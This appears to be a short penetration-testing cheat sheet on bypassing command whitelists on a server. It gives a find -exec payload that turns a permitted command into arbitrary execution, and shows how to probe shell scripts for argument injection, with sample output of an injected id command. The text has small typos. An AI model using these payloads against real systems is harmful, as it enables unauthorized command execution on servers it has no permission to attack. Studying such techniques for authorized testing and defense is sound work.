Comand whitelisting bypass

How does it work

In some cases the user can be allowed to run certain commands on the server e.g.:

dir

ls

./script.sh

Bypass #1

As an attackers we want to execute commands that are beyond the scope of whitelist. in some cases we can do it by useful parameters of whitelisted commands. For example imagine the command:

find

is permitted by whitelist. In that case we could trigger the RCE by the following payload:

find <path> -type <file_type> -name "<pattern>" -exec <command> {} \;

Bypass #2

When commands with parameters like that are not available we can proceed to other technique. Command injection in .sh scripts.

In some cases the data taken by scripts as an arguments are not properly escaped. That means we can inject malicious commands by escaping the input while providing special characters.

Double quotes (example of not working OS Command Injection)

One of the ways of discovering that in a blackbox approach is trying to provide two word input between " characters:

# not vulnerable script example
./script.sh =t "test test2"

You said test test2

Single quotes (example of working OS Command Injection)

If that works or not we can also try with single quotes:

# vulnerable script example
./script.sh -t 'test test2'

You said test

As we are able to observe second part is not returned. It can be an indication of command injection. Try to put as second command another command like:

# vulnerable script example
./script.sh -t 'test id'

You said test

uid=501(kamil) gid=20(staff) groups=20(staff)

or another argument and see if any response is created:

# vulnerable script example
./script.sh -t 'test --help'

id: illegal option -- -
usage: id [user]
       id -A
       id -F [user]
       id -G [-n] [user]

       id -P [user]
       id -g [-nr] [user]
       id -p [user]
       id -u [-nr] [user]